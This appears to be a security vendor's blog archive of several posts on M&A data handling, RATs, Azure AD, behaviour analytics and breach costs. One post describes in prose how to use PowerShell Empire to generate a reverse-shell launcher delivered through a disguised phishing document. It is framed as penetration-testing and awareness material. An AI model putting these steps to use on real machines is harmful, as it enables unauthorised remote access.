Category Archives: IT Pros

12 Ways Varonis Helps You Manage Mergers and Acquisitions

12 Ways Varonis Helps You Manage Mergers and Acquisitions

How Varonis Helps with Mergers and Acquisitions

A well-constructed Merger & Acquisition (M&A) playbook reduces the overall time, cost and risk of the upcoming merger and/or acquisition. Gartner advises that organizations who intend to grow through acquisitions involve the CIO and IT teams early in the process by “sharing models with their business executives that raise the right questions and issues to consider.” Further, according to Gartner analysts Cathleen E. Blanton and Lee Weldon, CIOs should “create a reusable IT M&A playbook that can be quickly deployed when an idea or opportunity arises” and to share this data with senior management.

One of the key challenges with any Merger & Acquisition is how to protect, classify, manage, and migrate unstructured data throughout the entire process. Varonis not only helps protect M&A data prior to, during, and after the announcement – but can help organizations with each stage along the way: Due Diligence, Integration, and Realization.

With Varonis, organizations can:

  • Assess risk and catalog resources during due diligence
  • Gain insight into security practices and procedures of the target organization
  • Discover domains and user accounts to prepare for integration into the new organization
  • Classify sensitive data in acquired data storage
  • Help create an audit strategy for inherited unstructured data
  • Migrate data to consolidated storage during integration
  • Eliminate the potential of service interruption to critical data

“CIOs in organizations that plan to grow through mergers and acquisitions must help executives appreciate how technology, data, and analytic capabilities support operational and strategic objectives. A few simple models can make the difference between M&A success and failure.”

-Cathleen E. Blanton and Lee Weldon, Gartner Inc.

Due Diligence

Due diligence is the phase of M&A where decision makers weigh the pros and cons of moving forward with the acquisition, and according to Gartner, is the phase that underutilizes IT resources the most.

Asking important questions like “is there a danger of a security breach disrupting our M&A?” or “is the acquisition target providing all of the information or hiding some important detail?” as well as having data to answer those questions is vital in the decision-making process.

50-70% of any organization’s data lives in unstructured repositories. This data can either be a goldmine or a landmine for a successful M&A. Varonis helps determine which of those two options you are getting.

“CIOs and their teams can quickly grasp and highlight the severity of lax security and the consequent risk to operations.”

-Cathleen E. Blanton and Lee Weldon, Gartner Inc.

Sensitive Content Discovery

Varonis Data Classification Engine classifies sensitive data in unstructured repositories, including email, cloud storage, and NAS devices. You will be able to asses if the acquisition target adequately manages their sensitive data, identify current security vulnerabilities, discover critical data that needs to be locked down, and if they are vulnerable to – or in some cases have already experienced – a major data breach.

Domain and User Discovery

Varonis DatAdvantage analyzes and gathers data about each domain and every user account in the acquisition target. Varonis automatically identifies executive, service, and privileged accounts – and helps prepare existing account management for the upcoming merger or acquisition. With this data, you can determine if the company has policies in place to manage and monitor user accounts and identify stale accounts that a hacker could use to steal data.

File System Discovery

Varonis DatAdvantage crawls the folder structure of data repositories, including all permissions on each folder. Is the company using least privilege permissions or global access groups? Does everyone have full read/write access on all folders?

With Varonis, you can instantly visualize or report on potential access for any user or group in Active Directory, Azure AD, or a local system; pinpoint over-exposed sensitive data; and identify excessive permissions.

Assess Risk

Varonis DatAlert has built-in risk dashboards that give teams the insight into what data is at risk, identify potentially suspicious user behavior, and track remediation efforts. You will be able to assess if there is a risk of an undisclosed data breach in the acquisition target.

It can be a career-ending mistake to move forward with an acquisition only to later discover a massive data breach in the acquired company’s data. Not to mention a potential loss of expected revenue that drove the acquisition in the first place.

Additionally, you’ll get a good idea of the amount of work required to integrate the acquired domains and file systems while analyzing the data from the Varonis discovery process. You will be able to provide a more accurate estimate of the amount of time before you reach value realization, which also influences decisions made during due diligence.

Reports

Varonis has several out-of-the-box reports that can be distributed to the M&A team and analyzed during the due diligence process. These reports will provide a clear picture of the unstructured data and security practices of the acquisition target. CIOs and IT teams can use data from Varonis to empower the M&A team to make the best decision during the due diligence phase for their organization.

Integration

Merging two companies IT infrastructures is not trivial. Throughout the process, you must be aware of possible security threats – both internal and external. There’s no rewinding the clock at this point: the deal is done, and the IT systems need to be consolidated and protected in order for the new organization to thrive.

A successful integration phase will be free of service disruptions and move quickly into the value realization phase of M&A.

Varonis provides key functionality you will use throughout the Integration process that will both speed up the integration and provide visibility to all stakeholders.

Domain Consolidation

The first and most immediate challenge in integration is “how do we get all of the users using the same systems with the correct permissions?”

Merging one or more domains into a single primary entity is very difficult with the basic toolset. Varonis DatAdvantage provides a single pane of glass into all domains and users and groups, streamlining that process while taking steps to preserve the integrity of permissions and data access.

DatAdvantage gives a clear picture of the current domain setup, so that the team can mirror the existing users and groups in the primary domain. Varonis provides a complete audit trail of the changes made, including the IT staff person who made the change. Reports on users and groups can help the M&A team verify that each user has the correct permissions in the new organization.

These reports also highlight potential problems in the domain configuration that could lead to data breaches, interrupted service, or data leaks – like orphaned or nested groups. That domain data will be refreshed and available for audit in DatAdvantage so that any issues created one day are resolved the next.

Folder Permissions

Nothing limits productivity like not having access to the resources you need to do your job. Varonis optimizes the process of changing and updating share and folder permissions. With the single-pane-of-glass view discussed above to consolidate the domains, you can view and modify folder permissions with a complete audit trail. You can easily add acquired users to the ACLs of existing resources, which keeps them productive throughout the integration.

Varonis DataPrivilege enables data owners to manage access directly, and makes the process for users to request access to data even easier. With DataPrivilege, new users request folder access from a simple interface, and the data owners review to approve or deny the request, removing IT from the burden of user access management.

The Varonis Automation Engine addresses any of the broken permissions issues that can occur when this much change is introduced into your company data. The Automation Engine makes it easy to revoke unnecessary access that users no longer need or use, keeping your data safe. Automatically fix inconsistent ACLs on folders, a hierarchy, or even an entire server – and eliminate inconsistent file permissions.

Data Migration and Storage Consolidation

Most merger and acquisition processes require a significant amount of data migration and storage consolidation, while also readdressing the newly acquired and expensive storage devices that you may or may not need.

The Varonis Data Transport Engine automates and simplifies large data migrations. Using the Data Transport Engine, you can move data from one storage server to another to save money and reduce overhead while maintaining or updating file access permissions.

The Data Transport Engine mirrors the existing permissions on the new storage using the information it already discovered from crawling the file structure, and can update permissions to achieve least privilege. The ability to consolidate storage systems can result in tens of thousands of dollars in savings to the new company moving forward. Data Transport Engine streamlines the process while maintaining least privilege permissions and protecting your data.

Lock Down Sensitive Data

The Varonis Data Classification Engine continues to scan acquired data for sensitive files throughout the due diligence and integration phases. As you discover new sensitive data you can use Varonis to help manage the files, folders, and subsequent permissions to keep the data safe, making sure that only the right people have access to the right data. You can also use the Data Transport Engine to move the files to quarantine.

Value Realization

Once due diligence and integrate are complete, organizations need to practice and maintain data-centric security in order to maintain the security and integrity of the data post-merger, and for potential future M&As.

Data Discovery and Classification

The Varonis Data Classification Engine has a wide array of built-in compliance packs for regulations such as GDPR, HIPAA, SOX, PCI-DSS, etc., while providing the ability to create custom rules, perform algorithmic verification, add manual flags, and even automatically quarantine or delete sensitive content that is out-of-policy.

Permissions Management

Varonis helps manage permissions and data access as a company grows, simplifying the permission structure on all platforms and revoking unnecessary permissions without affecting end users by simulating permission changes before applying new permissions.

Security Analytics

Varonis continuously monitors and analyzes user activity and behavior across hybrid environments and builds behavioral baselines for every account. Security teams can analyze data access events in context with data sensitivity, permissions, and Active Directory metadata, resulting in accurate alerts and fewer false positives.

With over 100 threat models, Varonis alerts on everything from unusual mailbox activity to insider threats to known malware behavior. Security teams have the flexibility to use the DatAlert dashboard or send alerts to an integrated SIEM.

Curious to see how Varonis can help with your M&A playbook? Get a customized demo and we’ll show you.

Adventures in Malware-Free Hacking, Part II

Adventures in Malware-Free Hacking, Part II

I’m a fan of the Hybrid Analysis site. It’s kind of a malware zoo where you can safely observe dangerous specimens captured in the wild without getting mauled. The HA team runs the malware in safe sandboxes and records systems calls, file created, and internet traffic, displaying the results for each malware sample. So you don’t have to necessarily spend time puzzling over or even, gulp, running the heavily obfuscated code to understand the hackers’ intentions.

The HA samples I focused on use either encasing JavaScript or Visual Basic for Applications (VBA) scripts, which are the “macros” embedded in Word or Excel documents attached to phish mails. These scripts then launch a Powershell session on the victim’s computer. The hackers usually send to the PowerShell a Base64-encoded stream. It’s all very sneaky and meant to make it difficult for monitoring software to find obvious keywords to trigger on.

Mercifully, the HA teams decodes Base64 and displays the plain text. In effect, you don’t really need to focus on how these scripts work because you’ll see the command line of the spawned processes in HA’s “Process launched” section. The screenshots below illustrate this:

Hybrid Analysis captures the Base64-encoded commands sent to a PowerShell process …

… and then decodes it for you. #amazing

In the last post, I created my own mildly obfuscated JavaScript container to launch a PowerShell session.

Then my script, like a lot of PowerShell-based malware, downloads a second PowerShell script from a remote web site. To do this safely, my dudware downloads a harmless 1-line of PS to print out a message.

This being the IOS blog we never, ever do anything nice and easy. Let’s take my scenario a step further.

PowerShell Empire and Reverse Shells

One of the goals of this exercise is to show how (relatively) easy it is for a hacker to get around legacy perimeter defenses and scanning software. If a non-programming security blogger such as myself can cook up potent fully undetected or FUD malware in a couple of afternoons (with help from lots of espressos), imagine what a smart Macedonian teenager can do!

And if you’re an IT security person who needs to convince a stubborn manager – I know they don’t exist, but let’s say you have one – that the company needs to boost its secondary defenses, my malware-free attack example might do the trick.

I’m not suggesting you actually phish management, though you could. If you take this route and use my scripts, the message that prints on their laptops would count as a cybersecurity “Boo!”.  It may be effective in your case.

But if your manager then challenges you by saying, “so what”, you can then follow up with what I’m about to show you.

Hackers want to gain direct access to the victim’s laptop or server. We’ve already reviewed how Remote Access Trojans (RATs) can be used to sneakily send and download files, issue commands, and hunt for valuable content.

However, you don’t have to go that far. It’s very easy to gain shell access, which for certain situations might be all a hacker requires – to get in and get out with a few sensitive files from the CEO’s laptop.

Remember the amazing PowerShell Empire post-exploitation environment that I wrote about?

It’s a, cough, pen testing tool, that among its many features lets you easily create a PowerShell-based reverse shell. You can more learn more about this on the PSE site.

Let’s take a quick walk through. I set up my malware testing environment within my AWS infrastructure so I can work safely. And you can do the same to show management a PoC (and not get fired for running grey area hacking software on the premises.)

If you bring up the main console of PowerShell Empire, you’ll see this:

First, you configure a listener on your hacking computer. Enter the commander “listener”, and follow up with “set Host” and the IP address of your system — that’s the “phone home” address for the reverse shell. Then launch the listener process with an “execute” command (below). The listener forms one end of your shell connection.

For the other, you’ll need to generate agent-side code, by entering the “launcher” command (below). This generates code for a PowerShell agent — note that it’s Base64-encoded — and will form the second stage of the payload. In other words, my JavaScript encasing code from last time will now pull down the PowerShell launcher agent, instead of the harmless code to output “Evil Malware”, and  connect to the remote agent in reverse-shell fashion.

Reverse-shell magic. This encoded PowerShell command will connect back to theremote listener and set up a shell.

To run this experiment, I played the part of an innocent victim and clicked on Evil.doc, which is  the JavaScript I set up last time. Remember? The PowerShell was configured to not pop-up a window, so the victim won’t notice anything unusual is going on. However, if you look at the Windows Task Manager, you’ll see the background PowerShell process, which may not trigger alarms ’cause it’s just PowerShell, right?

Now when you click on Evil.doc, a hidden background process will connect to the PowerShell Empire agent.

Putting on my hacker-pentester hat, I returned to my PowerShell Empire console, and now see the message that my agent is active.

I then issued an interact command to pop up a shell in PSE. And I’m in! In short: I hacked into the Taco server that I set-up once upon a time.

What I just described is not a lot of work. If you’re doing this for kicks during a long lunch hour or two to improve your infosec knowledge, it’s a great way to see how hackers get around border security defenses and stealthily lurk in your system.

And IT managers who believe that they’ve built breach-proof defense may, fingers crossed, find this enlightening – if you can convince them to sit down long enough.

Let’s Go Live

As I’ve been suggesting, real-world malware-free hacking is just variation on what I just presented. To get a little bit of a preview of the next post, I searched for Hybrid Analysis specimen that works in a similar fashion to my made-up sample. I didn’t have to search very long – there’s lots of this attack technique on their site

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. So instead of faking the doc extension, which I did for my JavaScript example, this malware-free malware is really, truly, a Microsoft document.

If you’re playing along at home, I picked this sample, called rfq.doc.

I quickly learned you often can’t directly pull out the actual evil VBA scripts. The hackers compressed or hid them, and they won’t show up in Word’s built-in macro tools.

You’ll need a special tool to extract it. Fortunately, I stumbled upon Frank Boldewin’s OfficeMalScanner. Danke, Frank.

Using this tool, I pulled out the heavily obfuscated VBA code. It looks a little bit like this:

Obfuscation done by pros. I’m impressed!

Attackers are really good at obfuscation, and my efforts in creating Evil.doc was clearly the work of a rank amateur.

Anyway, next time we’ll get out our Word VBA debuggers, delve into this code a little bit, and compare our analysis to what HA came up with it.

Continue reading the next post in "Malware-Free Hacking"

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

I’ve written a lot about Remote Access Trojans (RATs) over the last few years. So I didn’t think there was that much innovation in this classic hacker software utility. RATs, of course, allow hackers to get shell access and issue commands to search for content and then stealthily copy files. However, I somehow missed, DNSMessenger, a new RAT variant that was discovered earlier this year.

The malware runs when the victim clicks on a Word doc embedded in an email – it’s contained in a VBA script that then launches some PowerShell. Nothing that unusual so far in this phishing approach..

Ultimately, the evil RAT payload is set up in another launch stage. The DNSMessenger RAT is itself a PowerShell script. The way the malware unrolls is intentionally convoluted and obfuscated to make it difficult to spot. .

And what does this PowerShell-based RAT do?

RAT Logic

No one’s saying that a RAT has to be all that complicated. The main processing loop accepts messages that tells the malware  to execute commands and send results back.

Here’s a bit of DNSMessenger code to probe the DNS servers. The addresses are hardcoded.

The clever aspect of DNSMessenger is that — surprise, surprise — it uses DNS as the C2 server to query records from which it pulls in the commands.

It’s a little more complicated than what I’m letting on, and if you want, you can read the original analysis done by Cisco’s Talos security group.

Stealthy RAT

As noted by security pros, DNSMessenger  is effectively “file-less” since it doesn’t have to save any commands from the remote server onto the victim’s file system. Since it uses PowerShell, this makes DNSMessenger very difficult to detect when it’s running.  Using PowerShell also means that virus scanners won’t automatically flag the malware.

This is right out of the malware-less hacking cookbook.

Making it even more deadly is its use of the DNS protocol, which is not one of the usual protocols on which network filtering and monitoring is performed — such as HTTP or HTTPS.

A tip of the (black) hat to the hackers for coming up with this. But that doesn’t mean that DNSMessenger is completely undetectable. The malware does have to access the file system as commands are sent via DNS to scan folders and search for monetizable content. Varonis’s UBA technology would spot anomalies on the account on which DNSMessenger is running on.

It would be great if it were possible to connect the unusual file-access activity to the DNS exfiltration being done by DNSMessenger. Then we’d have hard-proof of an incident in progress.

Varonis Edge

We’ve recently introduced Varonis Edge, which is specifically designed to look for signs of attack at the perimeter, including VPNs, Web Security Gateways, and, yes, DNS.

As I mentioned in my last post, malware-free hacking is on the rise and we should expect to see more of it in 2018.

It would be a good exercise to experiment and analyze a DNSMessenger-style trojan. I can’t do it this month, but I am making as my first New Year’s resolution to try experimenting in January on my AWS environment.

In the meantime, try a demo of Varonis Edge to learn more.

Top Azure Active Directory Tutorials

Top Azure Active Directory Tutorials

Remember a few years ago when security pros and IT admins were afraid to store business files on the cloud? Today, the circumstances are different. I recently spoke with an engineer and he said he’s getting more questions about the cloud than ever before.

What’s more, according to Microsoft, 86% of Fortune 500 companies use Microsoft cloud services –  Azure, Office 365, CRM Online etc – all of which sit on Azure AD. And so it’s time that we embrace the future and start learning about the difference between Windows Server Active Directory and Azure AD, Azure AD premium, Azure AD Connect and more.

Yes, there are already many articles and books, but sometimes it’s helpful to have a human explain how things work. So this week, I scoured through hours of Ignite and TechEd videos and found the best Azure AD explainers. By the way, if you’re already using Office 365, you’re already using Azure AD. That seemed to be the same (trick) question asked on almost every video.

Azure Active Directory, described four different ways:

This video also explained Azure AD, but also provided foundational information on the challenges that lead to the creation of Azure AD, ie. the enormous amount of apps, multitude of devices, while maintaining all sorts of credentials and connections with all your Saas applications.

I also really liked the Cloud App Discovery feature. You’re able to get a report of how many SaaS applications your users are using and which users (and how much) are using the applications.

Azure AD Premium: If you’re curious about Azure AD premium, this video is a demo of an enterprise that had data on-prem, but started to move to cloud applications such as Office 365, workday HR, Salesforce and Marketing applications.

Azure AD Connect: The connector is a great tool to integrate your on-premise identity system with Azure AD and Office 365.

Azure AD best practices: It’s extremely helpful to learn from others, especially what worked, what didn’t work, especially circumstances under which important, fundamental security and infrastructure decisions were made.

Authentication on Azure AD: Before federation, a user had to share their username and password with any application that they wanted to use services on their behalf. Users had to trust unknown applications with their credentials, users had to update all their applications if their credentials changed, and once you provided your credentials, they could all do whatever they wanted. See what federation protocols, libraries and directories you’ll be using to authenticate on Azure AD and 101 ways to authenticate with Azure AD.

 

Defining Deviancy With User Behavior Analytics

Defining Deviancy With User Behavior Analytics

For over the last 10 years, security operations centers and analysts have been trading indicators of compromise (IoC), signatures or threshold-based signs of intrusion or attempted intrusion, to try to keep pace with the ever-changing threat environment. It’s been a losing battle.

During the same time, attackers have become ever more effective at concealing their activities. A cloaking technique, known as steganography, has rendered traditional signature and threshold-based detective measures practically useless.

In response, the security industry has seen new demand for User Behavior Analytics (UBA), which looks for patterns of activity and mathematically significant deviations of user behaviors (app usage, file searching activities), from historical baselines.

I’m often asked about what makes UBA different from traditional SIEM-based approaches.

Know Thy Behavioral History

In my mind, the answer is history! You know that old saying if you don’t remember the past, you’ll be condemned to repeat it? That’s applies to a pure SIEM-based approach that’s looking at – pun intended – current events: files deleted or copied, failed logins, malware signatures, or excessive connection requests from an IP address.

Of course, you need to look at raw events, but without context, SIEM-based stats and snapshots are an unreliable signal of what’s really happening. We call these “false positive when a SIEM system seems to indicate an alert when there’s not one. At some point, you end up continually chasing the same false leads, or, even worse, ignoring them all together — “dial-tone deaf”.

How many files are too many when a user is deleting or copying? How many failed logins are unusual for that particular user? When does it become suspicious for a user who visits a rarely accessed folder?

The key decision that has to be made for any event notification is  the right threshold to separate normal from abnormal.

Often there are tens, if not hundreds, or thousands of applications, and user accesses, each with a unique purpose and set of thresholds, signature, and alerts to configure and monitor. A brute-force approach results in rules not based on past data but on ad hoc, it-feels-right settings that generate endless reports and blinking dashboards that require a team of people to sift out the “fake news”.

This dilemma over how to set a threshold has led security researchers to a statistical approach, where thresholds are based on an analysis of real-world user behaviors.

The key difference between UBA and monitoring techniques that rely on static thresholds is that the decision to trigger is instead guided by mathematical models and statistical analysis that’s better able to spot true anomalies, ultimately reducing false positives. Some examples of behavioral alerts:

  • Alert when a user accesses data they has rarely been accessed before, at a time of day that’s unusual for that user — 4 AM Sunday — and then emails it to an ISP based in Croatia
  • Alert when a user has a pattern of failed login events over time that is outside the normal behavior
  • Alert when a user copies files from another users’ home directory, and then moves those files to a USB

A Simple UBA Example

The reason UBA is so effective is that it doesn’t depend only on signature- or static threshold-based analytics.

Let’s break this down with an example.

At Acme Inc., the security team has been asked to monitor the email activity of all of its 1,000 employees. Impossible, no?

We can understand the larger problem by focusing on just 5 users (0.5% of all users)  First, we apply traditional analytics and review their email activity (below) over the course of a week.

User Monday Tuesday Wednesday Thursday Friday
Andy 10 8 30 15 13
Molly 15 29 55 33 90
Ryan 35 6 7 15 16
Sam 2 5 4 9 15
Ivan 9 1 3 5 0

Looking at this report, you might decide to investigate the users who sent the most emails, right?

You quickly learn that Molly, who sent 90 emails on Friday, is with the marketing team and her performance is based on how many customers she emails in a day. False lead!

You then decide you’re going to take the average from all the users for each day of the way. You craft a static threshold alert whenever the user sends more emails than the average for a given day.  For the data set above, the average amount of emails sent by a user on any given day is 17.

If you created an alert for anytime a user sends more than 17 emails in a day you would’ve received 6 alerts during this time frame. Four of these alerts would bring you right back to Molly, the queen of email.

User Monday Tuesday Wednesday Thursday Friday
Andy 10 8 30 15 13
Molly 15 29 55 33 90
Ryan 35 6 7 15 16
Sam 2 5 4 9 15
Ivan 9 1 3 5 0

 

This threshold is obviously too sensitive. You need a different strategy than a raw average for all users on a given day — the vertical column.

UBA’s anomaly detection algorithm looking at each user, each day, and records information around their activity.  This historical information, sliced by day, time, and other dimensions, is stored in the system so baseline statistics can be created.

Think of it as the UBA tool running the reports and figuring out the averages and standard of deviations for each user, comparing it to their peers, and over time escalating only those users and activities that ‘stand out from the crowd’. UBA is also calculating averages, standard deviations, and other stats dynamically over time, so that they reflect possible shifts in the historical trends.

For example, here’s a possible behavioral rule: Alert when a user deviates from their baseline of normal activity when sending emails.

This could be translated more precisely as ‘notify when a user is two or more standards of deviation away from their mean’.

.

User Monday Tuesday Wednesday Thursday Friday Average STDEV.S 2 SD AVG+ 2SD
Andy 10 8 30 15 13 15.2 8.7 17.4 32.6
Molly 15 29 55 33 90 44.4 29.2 58.5 102.9
Ryan 35 6 7 15 16 15.8 11.6 23.3 39.1
Sam 2 5 4 9 15 7 5.1 10.3 17.3
Ivan 9 1 3 5 0 3.6 3.5 7.1 10.7

Obviously, this is not what’s done in practice – there are better statistical tests and more revealing analysis that can be performed.

The more important point is that by looking at users or a collection of users within, say, the same Active Directory groups, UBA can more accurately find and escalate true anomalies.

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How ...

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How I Work

In March of 2015, Mike Thompson joined the Commercial Sales Engineer (CSE) team. From then on, he has been responsible for demonstrating Varonis products to potential customers, installing and configuring the software for both evaluation and production implementations, leading customer training sessions, and making sure customers are getting value out of the Varonis solutions.

This role allows him to talk to people from different parts of the country, getting a glimpse of how companies of all shapes and sizes operate. “You become fast friends when you spend a few hours on an installation with someone.” says Mike.

According to his manager Kris Keyser:

“Mike is a smart, creative engineer who’s fun to work with, is well-liked by his customers and co-workers, but takes his craft seriously. He has been a real asset to the team.”

Read on to learn more about Mike – this time, in his own words.

What would people never guess you do in your role?

CSE’s already handle a lot of different things, but I suspect people would be most surprised to learn that I am a panelist on the Varonis Inside Out Security Show podcast.

How has Varonis helped you in your career development?

My time at Varonis has helped to develop my communication skills as well as providing me a better understanding of the tech and security industries since I work with so many different types of organizations. I already had technical skills before coming to Varonis, but now I am better equipped to apply my skills and experience at a larger scale.

What advice do you have for prospective candidates?

Organization is key! Also, do not be afraid to ask questions — we do a lot here at Varonis, and certain things can only be learned through direct experience.

What do you like most about the company?

The company culture is fantastic. Everyone works hard, but the expectations are very realistic, and there are plenty of opportunities to grow and take on new roles internally. Most importantly is the nitro cold brew tap that we have during the warm months. It is the best.

What’s the biggest data security problem your customers/prospects are faced with?

Many of our customers are taking a hard look at data security and they find that their existing security strategy and policies don’t necessarily reflect today’s threats.

The biggest problem is not identifying the risks, but rather formulating a plan of attack to rectify the situation and ensure data security going forward, as many of the customers I talk to already have a rough idea of their weak spots. Every aspect of this problem is complex, so many people don’t know where to start.

What certificates do you have?

I’m a wildcard. (That’s a certificate joke…)

Now for some Fun Facts on Mike!

What’ s your all-time favorite movie or tv show?

Mad Men is definitely my favorite TV show. I have been re-watching it lately and it’s even better the second time around. Spectacular writing, great character development, attention to historical detail, and surprisingly funny.

If you could choose any place in the world to live, where would it be and why?

Right now I have no desire to leave my home in Williamsburg, Brooklyn. It’s the ideal neighborhood for me and my wife. But one day I would like to live by the beach — maybe somewhere in California where the mountains meet the ocean.

What is the first thing you would buy if you won the lottery?

A nicer apartment!

Interested in becoming Mike’s colleague? Check out our open positions, here!

My Big Fat Data Breach Cost Post, Part III

My Big Fat Data Breach Cost Post, Part III

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

How much does a data breach cost a company? If you’ve been following this series, you’ll know that there’s a huge gap between Ponemon’s average cost per record numbers and the Verizon DBIR’s (as well other researcher’s). Verizon was intentionally provocative in its $.58 per record claim. However, Verizon’s more practical (and less newsworthy) results were based on using a different model that derived average record costs more in line with Ponemon’s analysis.

The larger issue, as I’ve been preaching, is that a single average for a skewed, or more precisely, a data set that follows a power law is not the best way to understand what’s going on. For a single number, the median, or the number where 50% of the data set lies below, does a better job of summarizing it all.

Unfortunately, when we introduce averages based on record counts, the problem is made even worse. Long sigh.

Fake News: Ponemon vs. Verizon Controversy

In other words, there are monster breaches in the Verizon data (based on NetDiligence’s insurance claim data) at the far end of the tail that result in hundreds of millions of records — and therefore an enormous denominator in calculating the average.

I should have mentioned last time that Ponemon’s dataset is based on breaches of less than 100,000 records. Since cyber incidents involve some hefty fixed amount costs for consulting and forensics, you’ll inevitably have a higher average when dividing the incident cost by a smaller denominator.

In brief: Ponemon’s $201 vs. Verizon’s $.58 average cost per record is a made up of controversy comparing the extremes of this weird dataset.

As I showed, when we ignore record counts and use average incident costs we get better agreement between Verizon and Ponemon – about $6 million per breach.

There’s a “but”.

Since we’re dealing with power laws, the single average is not a good representation. Why? So much of the sample is found at the beginning of the tail and the median — the incident cost where 50% of the incidents lie below — is not even close to the average!

My power law fueled analysis in the last post led to my amazing 3-tiered IOS Data Incident Cost Table©. I broke the fat-tailed dataset (based on NetDiligence’s numbers) into three smaller segments — Economy, Economy Plus, and Business Class —  to derive averages that are far more representative.

My Economy Class, which is based on 50% of the sample set, has an average incident cost of $1.4 million versus the overall average of $7.6 million. That’s an enormous difference! You can think of this average cost for 50% of the incidents as something like a hybrid of median and mean — it’s related to the creepy Lorenz curve from last time.

Ponemon and Pain

Let’s get back to the real world, and take another look at Ponemon’s survey. Their analysis is based on interviews with real people working for hundreds of companies worldwide.

Ponemon then calculates a total cost that takes in account direct expenses — credit monitoring for affected customer, forensic analysis —and fuzzier indirect costs, which can include extra employee hours and potential lost business.

These indirect costs are significant: for their 2015 survey, it represented almost 40% of the total cost of a breach!

As for the 100,000 record limit, Ponemon is well aware of this issue and warns that their average breach cost number should not be applied to large breaches. For example, Target’s 2014 data breach exposed the credit card number of over 40 million customers for a grand total of over $8 billion based on the Ponemon average. Target’s actual breach-related costs were far less.

One you go deeper into the Ponemon reports, you’ll find some incredibly useful insights.

In the 2016 survey, they note that having an incident response team in place lowers data costs per record by $16; Data Loss Prevention (DLP) takes another $8 off; and data classification schemes lop off an another $4.

Another interesting fact is that a large contributing factor to indirect costs is something called “churn”, which Ponemon defines as current customers who terminate their relationship as the result of loss of trust in the company after a breach.

Ponemon also estimates “diminished customer acquisition”, another indirect cost related to churn, which is the cost of lost future business because of damage to the brand.

These costs are based on Ponemon analysts reviewing internal corporate statistics and putting a “lifetime” value on a customer.

Feel the pain: Ponemon’s data on lost business.

Anyway, by comparing churns rates after a breach incident to historical averages, they can detect abnormal rates and then attribute the cost to the incident.

Ponemon consolidated the business lost to churn, additional acquisition costs, and damage to “goodwill” into a bar chart (above) divided by country. For the US,  the average opportunity cost of for a breach is close to $4 million.

With that in mind, it’s helpful to view the average cost per record breached as a measure of overall corporate pain.

What does that mean?

In addition to actual expenses, you can think of Ponemon’s average as also representing extra IT, legal, call center, and consultant person-days of work and emotional effort; additional attention focused in future product marketing and branding; and administrative and HR resources needed for dealing with personnel and morale issues after a breach.

All of these factors are worth considering when your organization plans its own breach response program!

Some Additional Thoughts

In our chats with security pros, attorneys, and even a small business owner who directly experienced a hacking, we learned first-hand that a breach incident is very disruptive.

It’s not just the “cost of doing” business as some have argued. In recent years, we’ve seen several CEO’s fired. More recently, with the Equifax breach, along with the C-suite leaving or “retiring”, the company’s very existence is being threatened through law suits.

There is something different about a data breach. Information on customers and executives, as well as corporate IP, can be leveraged in various creative and evil ways — identity theft attacks, blackmail, and competitive threats

While the direct upfront costs, though significant, may not reflect the $100 to $200 per record range that shows up in the press, a cyber attack resulting in a data exposure is still an expensive incident — as we saw above, over $1 million on average for most companies.

And for the longer term, Ponemon’s average cost numbers are the only measurement I know of that reflects the accounting for these unknowns.

It’s not necessarily a bad idea to be scared by Ponemon’s stats, and change your data security practices accordingly.

 

 

 

 

 

The Difference Between Windows Server Active Directory and Azure AD

The Difference Between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data on the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But over time with improved security, wider adoption and greater confidence, tech anxiety subsides and running cloud-based applications such as Microsoft’s subscription-based service Office 365 feels like a natural next step.

Once users start using Office 365, how do they manage AD? Windows Server AD or Azure AD? How are on-premise AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

First released with Windows 2000 Server edition, Active Directory is essentially a database that helps  organize your company’s users, computers and more. It provides authentication and authorization to applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the AD databases.

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory, as well as identity and access rights  managed there as well, securing AD is key to   safeguarding an organization’s assets.

Now with emails, files, CRM systems and even applications stored in the cloud, can we be as confident they’re as safe as when they were in the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premise data and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations with existing infrastructure have already made a significant investment in on-premise infrastructure and will have to visualize a new way of operationalizing their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services such as Office 365, Sharepoint Online and Exchange online, you’ll have to figure out how to navigate your way around it. And it already looks like organizations are rapidly adopting cloud-based apps and are running them nearly 50% of the time.

What’s Different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) API interfaces for Office 365, Salesforce.com etc. Unlike plain Active Directory, it uses completely different protocols (Goodbye, Kerberos and NTLM) that work with these services–protocols such as SAML and OAuth 2.0.

As I’ve pointed out earlier, with Azure AD, you won’t be creating forests and domains. Instead, you’ll be a tenant, which represents an entire organization. In fact, once you sign up for an Office 365, Sharepoint or Exchange Online, you’ll automatically be a Azure AD tenant, where you can manage all the users in the company as well as the passwords, permissions, user data, etc.

Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to hundreds of SaaS applications using a single sign-on. This lets employees access the organization’s data without repeatedly requiring them to log in. The access token is stored locally on the employee’s device. Plus you can limit access by creating token expiration dates.

For a list on free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

For organizations ready to migrate their on-premises structure to Azure AD, try Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid you farewell Kerberos, forests and domains. And flights of Microsoft angels sing thee to thy rest! 

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

